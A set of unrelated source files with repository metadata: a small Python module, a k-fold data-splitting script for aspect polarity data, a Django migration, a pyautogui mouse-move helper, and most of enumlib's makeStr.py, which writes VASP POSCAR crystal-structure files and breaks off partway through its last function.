8d989be35b4a12f5e33dfb1c5f24584eb840739b | 5ae0724a33861822786d1101d84ac607d04dde59 | /mod2.py | 1d6191ffcaaddc1c9b8d3919409fd4e9491c644f | [] | no_license | RahulKB31/ineuron_class | 9ea710eabc4d1e126347c5530093e914a823da70 | 1e093aa747f6e9406e46706181a8d8ab1c2daa48 | refs/heads/main | 2023-06-20T21:06:08.550787 | 2021-07-30T11:35:27 | 2021-07-30T11:35:27 | 379,680,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | def fn21():
print('this is my fn21 mod2')
def fn22():
print('this is my fn22 mod2')
def fn23():
print('this is my fn23 mod3')
| [
"noreply@github.com"
] | noreply@github.com |
eb9e884e967f1375f7635f675f77cb4c6d5d3b31 | 935a5dbec1e56a615f9d426c4cd8f31ed709ad45 | /data/generate_dev_polarity.py | 1111c54fbf96d16e360367468d4ac9fd50091ee9 | [] | no_license | PandasCute/BDCI_Car_2018 | 1f94a858f114506335ef3e3ebb48256035ed83ba | 1d8947fea362103ee6ca46133bfad3536fd5301f | refs/heads/master | 2020-04-09T04:04:42.729789 | 2018-12-05T03:58:13 | 2018-12-05T03:58:13 | 160,009,414 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,325 | py | import codecs
import numpy as np
seed = 1024
def kfold_split(length, k=5):
np.random.seed(seed)
index_list = np.random.permutation(length)
l = length // k
folds = []
for i in range(k):
test_idx = np.zeros(length, dtype=bool)
test_idx[i*l:(i+1)*l] = True
folds.append((index_list[~test_idx], index_list[test_idx]))
return folds
def load_abp_raw(filename): # aspect_based polarity
fo = codecs.open(filename, encoding='utf-8').readlines()
return fo
def splits(fo, train_index, dev_index):
train_texts, train_labels, train_aspects, test_texts, test_labels, test_aspects = [], [], [], [], [], []
for i in train_index:
line = fo[i]
splits = line.strip('\n').split('\t')
# text = text.lower()
text = splits[0].strip()
for pair in splits[1:]:
aspect = pair.split('#')[0]
p = pair.split('#')[1]
train_texts.append(text)
train_labels.append(p)
train_aspects.append(aspect)
for i in dev_index:
line = fo[i]
splits = line.strip('\n').split('\t')
# text = text.lower()
text = splits[0].strip()
for pair in splits[1:]:
aspect = pair.split('#')[0]
p = pair.split('#')[1]
test_texts.append(text)
test_labels.append(p)
test_aspects.append(aspect)
return train_texts, train_labels, train_aspects, test_texts, test_labels, test_aspects
def count_instance(fo):
count = 0
index_list = []
for line in fo:
current_index = []
splits = line.strip('\n').split('\t')
for p in splits[1:]:
assert '#' in p
current_index.append(count)
count += 1
index_list.append(current_index)
return count, index_list
if __name__ == '__main__':
f_train = 'train.txt'
fo = load_abp_raw(filename=f_train)
n_train, sentence2instance = count_instance(fo)
for i, (train_index, test_index) in enumerate(kfold_split(len(fo), 5)):
train_out = codecs.open("polarity_ensemble_online/%d/train.tsv" % (i+1), 'w', encoding='utf-8')
dev_out = codecs.open("polarity_ensemble_online/%d/dev.tsv" % (i+1), 'w', encoding='utf-8')
dev_index = codecs.open("polarity_ensemble_online/%d/dev.ind" % (i + 1), 'w', encoding='utf-8')
train_out.write('text\taspect\tlabels\n')
dev_out.write('text\taspect\tlabels\n')
train_texts, train_labels, train_aspects, test_texts, test_labels, test_aspects = splits(fo, train_index,
test_index)
test_i_index = [i_index for sentence_index in test_index for i_index in sentence2instance[sentence_index]]
for t, l, a in zip(train_texts, train_labels, train_aspects):
# print(t, l, a)
train_out.write(t + '\t' + a + '\t' + l + '\n')
print(len(test_i_index))
print(len(test_texts))
for t, l, ind, a in zip(test_texts, test_labels, test_i_index, test_aspects):
# print(t, l, a)
dev_out.write(t + '\t' + a + '\t' + l + '\n')
dev_index.write(str(ind) + '\n')
train_out.close()
dev_out.close()
dev_index.close()
| [
"fanzf@nlp.nju.edu.cn"
] | fanzf@nlp.nju.edu.cn |
0d5a4132c1a3c779a764137edb3a3e33431d8662 | fa89836a6759151896a07650747462b8cda40610 | /mse/about/migrations/0010_event_ordinal.py | 60b846d5a892fc107b9a4bef92acd71c0bed9132 | [] | no_license | DigitalGizmo/mse21 | 334813bfebec9b78f0541744e54f218f9cc6936b | 89f1c0f9c05cefaaa8c703732ee4e4642aecd3c9 | refs/heads/master | 2023-07-09T13:29:13.903900 | 2018-03-26T19:26:09 | 2018-03-26T19:26:09 | 126,878,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('about', '0009_single'),
]
operations = [
migrations.AddField(
model_name='event',
name='ordinal',
field=models.IntegerField(verbose_name='Order in Menu', default=99),
),
]
| [
"donpublic@digitalgizmo.com"
] | donpublic@digitalgizmo.com |
7d26b9e1f9a52eb6d0b65a86bff16fcf9aeb474d | 5b7456802cdfaf5edfaf7f1746691390ddc4d752 | /smh_eyetracking/interfaces/mouse_behavior/move_to.py | 91739405b4eadbd52510cb2b4128153d69d8b693 | [] | no_license | next-samuelmunoz/hci-eye_tracking-workshop | 084b1940e044354168b03cb032853784a6085b7d | 62fe7a3691ba9d089d34cbe4944266898500fd23 | refs/heads/master | 2021-08-08T14:10:54.424855 | 2017-11-10T12:59:22 | 2017-11-10T12:59:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # -*- coding: utf-8 -*-
""" Just move the mouse.
"""
import numpy as np
import pyautogui
class MoveTo():
def __init__(self, threshold_radius, duration=0.2):
self.threshold_radius = threshold_radius
self.duration = duration
self.mouse_pos = np.array([0,0])
def action(self, mouse_pos):
if np.linalg.norm(mouse_pos-self.mouse_pos)>self.threshold_radius:
x,y = mouse_pos
pyautogui.moveTo(x, y, duration=self.duration)
self.mouse_pos = mouse_pos
| [
"samuel.munoz@beeva.com"
] | samuel.munoz@beeva.com |
5b26ad7dc37b97e969b5062c600ab287b8c20353 | 6d85a8c2842ccf22928c235a159f114ce0821bd6 | /aux_src/makeStr.py | 34eecd5ffc10ce1ed2aa362cec0ef7625448f88c | [
"MIT"
] | permissive | mkhorton/enumlib | 60b6e6f7d78c667852169ebcd7cd2628a7af431e | 3cf85cb230b170d37ddb6e24acb231b8736eb9fb | refs/heads/master | 2021-01-20T22:11:32.110540 | 2017-08-29T17:28:31 | 2017-08-29T17:28:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,859 | py | """This scripts produces the VASP style POSCAR."""
from __future__ import print_function
from termcolor import cprint
import warnings
# The dictionary of all the elements on the periodic table
all_elements ={"H": 3.75,"He": 3.57,"Li": 3.49,"Be": 2.29,"B": 8.73,"C": 3.57,"N": 4.039,
"O": 6.83,"Ne": 4.43,"Na": 4.23,"Mg": 3.21,"Al": 4.05,"Si": 5.43,"P": 7.17,
"S": 10.47,"Cl": 6.24,"Ar": 5.26,"K": 5.23,"Ca": 5.58,"Sc": 3.31,"Ti": 2.95,
"V": 3.02,"Cr": 2.88,"Mn": 8.89,"Fe": 2.87,"Co": 2.51,"Ni": 3.52,"Cu": 3.61,
"Zn": 2.66,"Ga": 4.51,"Ge": 5.66,"As": 4.13,"Se": 4.36,"Br": 6.67,"Kr": 5.72,
"Rb": 5.59,"Sr": 6.08,"Y": 3.65,"Zr": 3.23,"Nb": 3.3,"Mo": 3.15,"Tc": 2.74,
"Ru": 2.7,"Rh": 3.8,"Pd": 3.89,"Ag": 4.09,"Cd": 2.98,"In": 4.59,"Sn": 5.82,
"Sb": 4.51,"Te": 4.45,"I": 7.27,"Xe": 6.2,"Cs": 6.05,"Ba": 5.02,"Hf": 3.2,
"Ta": 3.31,"W": 3.16,"Re": 2.76,"Os": 2.64,"Ir": 3.84,"Pt": 3.92,"Au": 4.08,
"Hg": 2.99,"Tl": 3.46,"Pb": 4.95,"Bi": 4.75}
verbosity = None
"""The verbosity level of messages being printed by the module."""
quiet = None
"""When in quiet mode, no text is ever printed to terminal unless its
verbosity level is explicitly specified.
"""
cenum = {
"cerrs": 0,
"cwarn": 1,
"cinfo": 2,
"cgens": 3,
"cstds": 4,
"cokay": 5
}
"""Dict of the various colors available for coloring specific
lines in the arb().
"""
icols = ["red", "yellow", "cyan", "blue", "white", "green"]
nocolor = False
"""When true, the colored outputs all use the regular print() instead
so that the stdout looks ordinary.
"""
def _common_parser():
"""Returns a parser with common command-line options for all the scripts
in the fortpy suite.
"""
import argparse
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("-examples", action="store_true",
help="See detailed help and examples for this script.")
parser.add_argument("-verbose", action="store_true",
help="See verbose output as the script runs.")
parser.add_argument('-action', nargs=1, choices=['save','print'], default='print',
help="Specify what to do with the output (print or save)")
parser.add_argument("-debug", action="store_true",
help="Print verbose calculation information for debugging.")
return parser
bparser = _common_parser()
testmode = False
"""bool: when True, the package is operating in unit test mode, which changes
how plotting is handled.
"""
def deprecated(func):
'''This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.'''
def new_func(*args, **kwargs):
warnings.warn("Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning)
return func(*args, **kwargs)
new_func.__name__ = func.__name__
new_func.__doc__ = func.__doc__
new_func.__dict__.update(func.__dict__)
return new_func
def exhandler(function, parser):
"""If -examples was specified in 'args', the specified function
is called and the application exits.
:arg function: the function that prints the examples.
:arg parser: the initialized instance of the parser that has the
additional, script-specific parameters.
"""
args = vars(bparser.parse_known_args()[0])
if args["examples"]:
function()
return
if args["verbose"]:
from liveserial.msg import set_verbosity
set_verbosity(args["verbose"])
args.update(vars(parser.parse_known_args()[0]))
return args
def set_testmode(testing):
"""Sets the package testing mode.
"""
global testmode
testmode = testing
def RepresentsInt(s):
"""Determines if a string could be an int.
:arg s: The string to be tested.
"""
try:
int(s)
return True
except ValueError:
return False
def RepresentsFloat(s):
"""Determines if a string could be an float.
:arg s: The string to be tested.
"""
try:
float(s)
return True
except ValueError:
return False
def example(script, explain, contents, requirements, output, outputfmt, details):
"""Prints the example help for the script."""
blank()
cprint(script.upper(), "yellow")
cprint(''.join(["=" for i in range(70)]) + '\n', "yellow")
cprint("DETAILS", "blue")
std(explain + '\n')
cprint(requirements, "red")
cprint(output, "green")
blank()
if details != "":
std(details)
blank()
cprint("OUTPUT FORMAT", "blue")
std(outputfmt)
blank()
cprint("EXAMPLES", "blue")
for i in range(len(contents)):
pre, code, post = contents[i]
std("{}) {}".format(i + 1, pre))
cprint(" " + code, "cyan")
if post != "":
std('\n' + post)
blank()
def printer(text, color=None, **kwargs):
"""Prints using color or standard print() depending on the value
of 'nocolor'.
"""
if nocolor:
# import sys
# sys.stdout.write(text + "" if ("end" in kwargs and kwargs["end"] == "") else '\n')
# sys.stdout.flush()
print(text, **kwargs)
else:
if color is None:
cprint(text, **kwargs)
else:
cprint(text, color, **kwargs)
def arb(text, cols, split):
"""Prints a line of text in arbitrary colors specified by the numeric
values contained in msg.cenum dictionary.
"""
stext = text if text[-1] != split else text[0:-1]
words = stext.split(split)
for i, word in enumerate(words):
col = icols[cols[i]]
printer(word, col, end="")
if i < len(words)-1:
printer(split, end="")
else:
printer(split)
def set_verbosity(level):
"""Sets the modules message verbosity level for *all* messages printed.
:arg level: a positive integer (>0); higher levels including more detail.
"""
global verbosity
verbosity = level
def set_quiet(is_quiet):
"""Sets whether the messaging system is running in quiet mode. Quiet mode
only prints messages with explicit verbosity specified. If verbosity==None
and quiet==True, any message with level >= 0 is printed.
"""
global quiet
quiet = is_quiet
def will_print(level=1):
"""Returns True if the current global status of messaging would print a
message using any of the printing functions in this module.
"""
if level == 1:
#We only affect printability using the quiet setting.
return quiet is None or quiet == False
else:
return ((isinstance(verbosity, int) and level <= verbosity) or
(isinstance(verbosity, bool) and verbosity == True))
def warn(msg, level=0, prefix=True):
"""Prints the specified message as a warning; prepends "WARNING" to
the message, so that can be left off.
"""
if will_print(level):
printer(("WARNING: " if prefix else "") + msg, "yellow")
def err(msg, level=-1, prefix=True):
"""Prints the specified message as an error; prepends "ERROR" to
the message, so that can be left off.
"""
if will_print(level) or verbosity is None:
printer(("ERROR: " if prefix else "") + msg, "red")
def info(msg, level=1):
"""Prints the specified message as information."""
if will_print(level):
printer(msg, "cyan")
def okay(msg, level=1):
"""Prints the specified message as textual progress update."""
if will_print(level):
printer(msg, "green")
def gen(msg, level=1):
"""Prints the message as generic output to terminal."""
if will_print(level):
printer(msg, "blue")
def blank(n=1, level=2):
"""Prints a blank line to the terminal."""
if will_print(level):
for i in range(n):
print("")
def std(msg, level=1):
"""Prints using the standard print() function."""
if will_print(level):
print(msg)
def _gaussian_reduce_two_vectors(U,V,eps):
"""This routine takes two vectors (in three-space) and reduces them to
form a shortest set (Minkowski reduced). The idea is to subtract
multiples of U from V so that the new V is as close to the origin
as any lattice point along the line that passes through U in the
direction of V. The process is repeated until the new vector isn't
shorter than the other. It's pretty obvious if you do an example
by hand. Also see 3.1 of Lecture notes in computer science, ISSN
0302-974, ANTS - VI: algorithmic number theory, 2004, vol. 3076,
pp. 338-357 ISBN 3-540-22156-5. Fixes made Apr 2012 GLWH (not sure
if they made a practical difference though)
:arg U: a vector
:arg V: a vector
:arg eps: finite precision tolerance
"""
from numpy.linalg import norm
from numpy import dot
it = 0
if norm(U) > (norm(V) - eps):
# Make sure that the {U,V} are listed in ascending order; ||U||<||V||
temp = U
U = V
V = temp # Keep V as the longest vector
done = False
it = 1
while not done:
if it > 10: # pragma: no cover
err("gaussian_reduce_two_vectors failed to converge in 10 iterations")
exit()
R = [V[i]-int(round(dot(U,V)/dot(U,U)+1E-10))*U[i] for i in range(3)] #Shorten V as much as possible
V = U # Swap U and V (so U remains the shortest)
U = R
if norm(U) >= (norm(V) - eps):
done = True
it += 1
# Make sure that the {U,V} are listed in ascending order on exit; ||U||<||V||
temp = U
U = V
V = temp
return U, V
def _minkowski_conditions_check(basis,eps):
"""This function checks the minkowski conditions for a 3D lattice
basis.
:arg basis: The atomic basis vectors
:arg eps: finitie precision tolerance
"""
from numpy import linalg
b1 = basis[0]
b2 = basis[1]
b3 = basis[2]
minkowski_check = True
if linalg.norm(b1) > (linalg.norm(b2) + eps):
minkowski_check = False
err("Minkowski_condition 1 failed: b1 > b2")
if linalg.norm(b2) > (linalg.norm(b3) + eps):
minkowski_check = False
err("Minkowski_condition 2 failed: b2 > b3")
if linalg.norm(b2) > (linalg.norm([b1[i]+b2[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 3 failed: b2 > b1+b2")
if linalg.norm(b2) > (linalg.norm([b1[i]-b2[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 4 failed: b2 > b1-b2")
if linalg.norm(b3) > (linalg.norm([b1[i]+b3[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 5 failed: b3 > b1+b3")
if linalg.norm(b3) > (linalg.norm([b3[i]-b1[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 6 failed: b3 > b3-b1")
if linalg.norm(b3) > (linalg.norm([b2[i]+b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 7 failed: b3 > b2+b3")
if linalg.norm(b3) > (linalg.norm([b3[i]-b2[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 8 failed: b3 > b3-b2")
if linalg.norm(b3) > (linalg.norm([b1[i]+b2[i]+b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 9 failed: b3 > b1+b2+b3")
if linalg.norm(b3) > (linalg.norm([b1[i]-b2[i]+b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 10 failed: b3 > b1-b2+b3")
if linalg.norm(b3) > (linalg.norm([b1[i]+b2[i]-b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 11 failed: b3 > b1+b2-b3")
if linalg.norm(b3) > (linalg.norm([b1[i]-b2[i]-b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 12 failed: b3 > b1-b2-b3")
return minkowski_check
def _reduce_C_in_ABC(A,B,C,eps):
"""This routine takes three vectors, A,B,C, defining a lattice, and
reduces the last one so that it is as close as possible to the
origin while remaining in an affine plane, which is parallel to
the A-B plane but which passes through the end of the C
vector. See Lecture notes in computer science, ISSN 0302-974, ANTS
- VI : algorithmic number theory, 2004, vol. 3076, pp. 338-357
ISBN 3-540-22156-5
:arg A: a vector
:arg B: a vector
:arg C: a vector
:arg eps: finite precision tolerance
"""
from numpy import cross, linalg, dot, allclose, matmul, array
from copy import deepcopy
from math import floor
oldABC = deepcopy([A,B,C])
# Use Gaussian reduction to reduce the A,B 2D basis so that it is
# itself Minkowski reduced. If this is done, then the closest
# lattice point (in A,B plane) to the projection of C (into the
# A,B plane) is guaranteed to be one of the corners of the unit
# cell enclosing the projection of C
(A,B) = _gaussian_reduce_two_vectors(A,B,eps)
# First thing to do is find the (real, not lattice) point in the
# affine plane A,B + C that is nearest the origin. Call this T.
cpdAB = [i/linalg.norm(cross(A,B)) for i in cross(A,B)]
T = [C[i] - cpdAB[i]*dot(C,cpdAB) for i in range(3)]
if not allclose(dot(T,cross(A,B)),0,atol=eps,rtol=eps): #pragma: no cover
err("{} Projection of C into A,B plane failed".format(str(dot(T,cross(A,B)))))
# Now find the four points of the A,B lattice, in the affine
# plane, that enclose the point T
ABC = [A,B,C]
ABCinv = linalg.inv(ABC)
LC = [int(floor(i +eps)) for i in matmul(T,ABCinv).tolist()]
# Compute the distance from T to each of the four corners of the cell and pick
# the one that is the closest.
corners = array([[0,0,0],[1,0,0],[0,1,0],[1,1,0]])
dist = []
for i in range(0,4):
temp1 = corners[i] + array(LC)
temp2 = array(T) -matmul((corners[i] + array(LC)),ABC)
dist.append(linalg.norm(array(T) -matmul((corners[i] + array(LC)),ABC)))
idx = dist.index(min(dist))
if idx == 0:
temp1 = [corners[0][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
elif idx == 1:
temp1 = [corners[1][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
elif idx == 2:
temp1 = [corners[2][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
elif idx == 3:
temp1 = [corners[3][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
else: #pragma: no cover
err("Case failed in reduce_C_in_ABC"
"Lattice coordinates in the A,B plane: ".format(' '.join([str(i) for i in LC])))
ABC = [A,B,C]
ABCinv = linalg.inv(ABC)
temp = matmul(list(map(list,zip(*ABCinv))),list(map(list,zip(*oldABC)))).tolist()
for i in range(3):
for j in range(3):
if abs(temp[i][j] - int(round(temp[i][j]))) > eps: #pragma: no cover
err("Lattice was not preserved in reduce_C_in_ABC")
exit()
return A, B, C
def _get_lattice_parameter(elements, concentrations, default_title):
"""Finds the lattice parameters for the provided atomic species using Vagars law.
:arg elements: A dictionary of elements in the system and their concentrations.
:arg title: The default system title.
:arg concentrations: The concentrations of each element.
"""
if elements == None:
lat_param = 1.0
title = default_title
else:
if len(elements) != len(concentrations):
raise ValueError("You have provided {} element names when {} elements are present "
"in the system. Please provide the correct number of elements."
.format(len(elements),len(concentrations)))
else:
title = ""
lat_param = 0
for i in range(len(elements)):
lat_param += concentrations[i]*all_elements[elements[i]]
if concentrations[i] > 0:
title += " {} ".format(elements[i])
lat_param = float(lat_param) / sum(concentrations)
title = "{0} {1}\n".format(default_title.strip(),title)
return lat_param, title
def _cartesian2direct(sLV,aBas, eps):
"""This routine takes three lattice vectors and a list of atomic basis
vector in Cartesian coordinates and converts them to direct
("lattice") coordinates.
:arg sLV: Superlattice vectors (Cartesian coordinates)
:arg aBas: Atomic positions (cartesian coordinates first, then direct)
:arg eps: Finite precision tolerance.
"""
from numpy import linalg, matmul, array
nAt = len(aBas)
sLVinv = linalg.inv(sLV)
# Convert aBas to DIRECT COORDINATES
for iAt in range(nAt):
aBas[iAt] = matmul(aBas[iAt],sLVinv) # Put positions into
# "direct" coordinates This keeps the atomic coordinates inside
# the first unit cell--- not necessary but aesthetically
# pleasing.
while any(aBas[iAt] >= (1.0-eps)) or any(aBas[iAt] < (0.0-eps)):
aBas[iAt] = array([i if i < (1.0-eps) else i-1.0 for i in aBas[iAt]])
aBas[iAt] = array([i if i >= (0.0-eps) else i+1.0 for i in aBas[iAt]])
return aBas
def _map_enumStr_to_real_space(system_data,structure_data,minkowskiReduce):
"""Maps an enumerated structure back to real space. Returns a
dictionary containing the real space data.
:arg system_data: a dictionary containing all the information about the sysytem.
:arg sturture_data: a dictionary containing the information for this structure.
:arg minkowskiReduce: logical indicating if basis should be reduced.
"""
from numpy import matmul, allclose, matrix, array
nD = system_data["nD"]
n = structure_data["n"]
# DEFINE the non-zero elements of the HNF matrix
a = structure_data["HNF"][0][0]
b = structure_data["HNF"][1][0]
c = structure_data["HNF"][1][1]
d = structure_data["HNF"][2][0]
e = structure_data["HNF"][2][1]
f = structure_data["HNF"][2][2]
pBas = system_data["dvecs"]
S = structure_data["diag"]
pLV = system_data["plattice"]
HNF = structure_data["HNF"]
eps = system_data["eps"]
L = structure_data["L"]
# Compute the superlattice vectors
sLV = matmul(pLV,HNF).tolist()
# Find the coordinates of the basis atoms
gIndx = []
if minkowskiReduce:
sLV = list(map(list,zip(*_minkowski_reduce_basis(list(map(list,zip(*sLV))),eps))))
# Find each atomic position from the g-space information
aBas = []
ic = 0 # Keep track of the number of points mapped so far
# Loop over the number at sites/parent cell (the d set)it
for iD in range(0, nD):
# For the limits on the loops, see the "interior_points.pdf" write-up
for z1 in range(a):
for z2 in range(int((b*z1)/a), int(c+(b*z1)/a)):
for z3 in range(int(z1*(d-(e*b)/c)/a+(e*z2)/c), int(f+z1*(d-(e*b)/c)/a+(e*z2)/c)):
ic +=1
# if ic > n: #pragma: no cover
# err("Problem with basis atoms in map_enpStr_to_real_space...")
# exit()
# Atomic basis vector in Cartesian coordinates
temp = matmul(pLV,[z1,z2,z3]).tolist()
temp2 = [temp[i]+pBas[iD][i] for i in range(len(pBas[iD]))]
aBas.append(temp2)
# Map position into the group
greal = matmul(L,[float(z1),float(z2),float(z3)]).tolist()
g = [int(i) for i in greal] # Convert the g-vector from real to integer
if not allclose(greal,g,rtol=eps,atol=eps): #pragma: no cover
err("map2G didn't work in map_enumStr_to_real_space")
exit()
# Bring the g-vector back into the first tile
g = [g[i]%S[i] for i in range(len(S))]
# gIndx is the index in the configuration string that
# tells us which atom type is used at this position
gIndx.append((iD)*S[0]*S[1]*S[2]+g[0]*S[1]*S[2]+g[1]*S[2]+g[2])
if ic != n*nD: #pragma: no cover
err("ERROR: map_enumStr_to_real_space: Didn't find the correct # of basis atoms")
exit()
k = system_data["k"]
x = []
for i in range(k):
x.append(0.0)
labeling = structure_data["labeling"]
spin = []
if k % 2 == 0:
for iAt in range(0, n*nD):
i = int(labeling[gIndx[iAt]])
digit = i-k//2 # convert 0..k-1 label to spin variable -k/2..k/2
x[i] += 1 # Keep track of the concentration of each atom type
if digit < 0:
spin.append(digit)
else:
spin.append(digit+1) # skip 0 as a spin if k is even
else:
for iAt in range(0, n*nD):
i = int(labeling[gIndx[iAt]])
spin.append(i-k//2)
x[i] += 1 # Keep track of the concentration of each atom type
x = [i/float(n*nD) for i in x]
space_data = {"sLV": list(map(list,zip(*sLV))), "aBas": aBas, "spin": spin, "gIndx": gIndx, "x": x}
return space_data
def _minkowski_reduce_basis(IN,eps):
"""Performs a minkowski reduction on the basis atoms."""
from numpy import allclose, linalg, array, matrix
from copy import deepcopy
limit = 10
if allclose(linalg.det(IN),0.0,rtol=eps,atol=eps):
raise ValueError("Input basis for 'minkowski_reduce_basis' was not linearly independent")
OUT = deepcopy(IN)
# Keep applying the greedy algorithm until the vectors come out already sorted
for it in range(1, limit +1):
# Sort the three vectors into ascending order
temp = deepcopy(OUT)
norms = linalg.norm(temp,axis=1).tolist()
tt = list(range(3))
tt.reverse()
for i in tt:
idx = norms.index(max(norms))
temp[i] = OUT[idx]
norms[idx] = 0
OUT = deepcopy(temp) # Copy the sorted vectors back to OUT
(OUT[0], OUT[1], OUT[2]) = _reduce_C_in_ABC(OUT[0],OUT[1],OUT[2],eps)
if linalg.norm(OUT[2]) >= (linalg.norm(OUT[1])-eps):
break
if not _minkowski_conditions_check(OUT,eps): #pragma: no cover
err("ERROR in minkowski_reduce_basis: Minkowski conditions not met."
"Number of iterations: {}".format(str(limit)))
exit()
# we want to make sure that the det is positive.
# NOTE: This *destroys* the mathematical picture of a "greedy reduced basis" (Minkowski), but
# from a physical point of view we don't care ;-)
# Either way, the basis is as orthogonal as possible.
if linalg.det(OUT) < 0:
temp[0] = OUT[1]
OUT[1] = OUT[2]
OUT[2] = temp[0]
return OUT
def _read_enum_out(args):
"""Reads the struct_enum.out file and builds a dictionary with the needed
information to construct a POSCAR.
:arg args: The makeStr.py input arguments
"""
from numpy import transpose
# which structures are wanted
if args["structures"] == None:
with open(args["input"],"r") as f:
for count, l in enumerate(f):
pass
structures = list(range(1,count-13))
else:
structures = args["structures"]
# open the enum.out style file.
structf = open(args["input"],"r")
# we'll build a dictionary of the system data and a list of
# dictionaries for the structures that are wanted.
structure_data = []
system = {}
system["plattice"] = []
system["dvecs"] = []
line_count = 1
system["nD"] = 0
for line in structf:
temp = line.rstrip()
if not temp.startswith("#") and "#" not in temp.split()[0]:
if line_count == 1:
system["title"] = temp
if line_count == 2:
system["bulksurf"] = temp
if line_count in [3,4,5]:
vec = [float(v) for v in temp.split() if RepresentsFloat(v)]
system["plattice"].append(vec)
if line_count == 6:
system["nD"] = int(temp.rstrip().split()[0])
if system["nD"] != 0 and line_count in range(7,7+system["nD"]):
vec = [float(v) for v in temp.split() if RepresentsFloat(v)]
system["dvecs"].append(vec)
if line_count == 7+system["nD"]:
system["k"] = int(temp.split('-')[0].strip())
if line_count == 9 + system["nD"]:
system["eps"] = float(temp.strip().split()[0])
if line_count - (14 + system["nD"]) in structures:
data = temp.split()
this_struct = {}
this_struct["strN"] = int(data[0])
this_struct["hnfN"] = int(data[1])
this_struct["hnf_degen"] = int(data[2])
this_struct["lab_degen"] = int(data[3])
this_struct["tot_degen"] = int(data[4])
this_struct["sizeN"] = int(data[5])
this_struct["n"] = int(data[6])
this_struct["pgOps"] = int(data[7])
this_struct["diag"] = [int(data[8]),int(data[9]),int(data[10])]
this_struct["HNF"] = [[int(data[11]),0,0],[int(data[12]),int(data[13]),0],
[int(data[14]),int(data[15]),int(data[16])]]
this_struct["L"] = [[int(data[17]),int(data[18]),int(data[19])],
[int(data[20]),int(data[21]),int(data[22])],
[int(data[23]),int(data[24]),int(data[25])]]
this_struct["labeling"] = data[26]
if len(data) == 28:
this_struct["directions"] = data[27]
else:
this_struct["directions"] = '0'*len(this_struct["labeling"])
structure_data.append(this_struct)
line_count += 1
system["plattice"] = transpose(system["plattice"])
return (system, structure_data)
def _write_POSCAR(system_data,space_data,structure_data,args):
"""Writes a vasp POSCAR style file for the input structure and system
data.
:arg system_data: a dictionary of the system_data
:arg space_data: a dictionary containing the spacial data
:arg structure_data: a dictionary of the data for this structure
:arg args: Dictionary of user supplied input.
"""
from numpy import array
from random import uniform
# Get the output file name.
if "{}" in args["outfile"]:
filename = args["outfile"].format(str(structure_data["strN"]))
else:
filename = args["outfile"] + ".{}".format(str(structure_data["strN"]))
# Get the labeling, group index, structure number and arrow labels
# from the input data structure.
labeling = structure_data["labeling"]
gIndx = space_data["gIndx"]
arrows = structure_data["directions"]
struct_n = structure_data["strN"]
# The arrow basis.
arrow_directions = [[1,0,0],[-1,0,0],[0,1,0],[0,-1,0],[0,0,1],[0,0,-1]]
directions = []
# Construct the concentrations of the atoms from the labeling by
# counting the number of each type of atom present in the
# labeling.
concs = []
for i in range(system_data["k"]):
this_conc = 0
for atom in range(structure_data["n"]*system_data["nD"]):
if labeling[gIndx[atom]] == str(i):
this_conc += 1
concs.append(this_conc)
def_title = "{} str #: {}\n".format(str(system_data["title"]),str(structure_data["strN"]))
# Get the lattice parameter for the atomic species provided by the
# user.
lattice_parameter, title = _get_lattice_parameter(args["species"],concs,def_title)
# Find out the directions for each arrow.
for arrow in arrows:
directions.append(array(arrow_directions[int(arrow)]))
sLV = space_data["sLV"]
# Start writing the data to the file.
with open(filename,"w+") as poscar:
# First write the title and the lattice parameter.
poscar.write(title)
poscar.write("{0:.2f}\n".format(lattice_parameter))
# Then write out the lattice vectors.
for i in range(3):
poscar.write(" {}\n".format(" ".join(
["{0: .8f}".format(j) for j in sLV[i]])))
poscar.write(" ")
# Write the concentrations to the output file. If no species
# were passed in by the user then we want to write all the
# elements concentrations to the file including the
# zeros. Otherwise we can exclude the zero concentration
# elements from the list so that the file is ready to use out
# of VASP.
if args["species"] == None:
for ic in concs:
poscar.write("{} ".format(str(ic)))
else:
for ic in concs:
if ic != 0:
poscar.write("{} ".format(str(ic)))
poscar.write("\n")
poscar.write("D\n")
# Now write out the atomic positions to the file.
for ilab in range(system_data["k"]):
for iAt in range(structure_data["n"]*system_data["nD"]):
rattle = uniform(-args["rattle"],args["rattle"])
displace = directions[iAt]*args["displace"]*lattice_parameter
# If the displacement is non zero and we're `rattling`
# the system then we need to modify the displacement
# by the amount being rattled.
displace += displace*rattle
if labeling[gIndx[iAt]] == str(ilab):
# The final atomic position is the position from
# the basis plus the total displacement.
out_array = array(space_data["aBas"][iAt]) + displace
poscar.write(" {}\n".format(
" ".join(["{0: .8f}".format(i) for i in out_array.tolist()])))
def _make_structures(args):
"""Makes a VASP POSCAR file for the desired structures."""
(system, structure_data) = _read_enum_out(args)
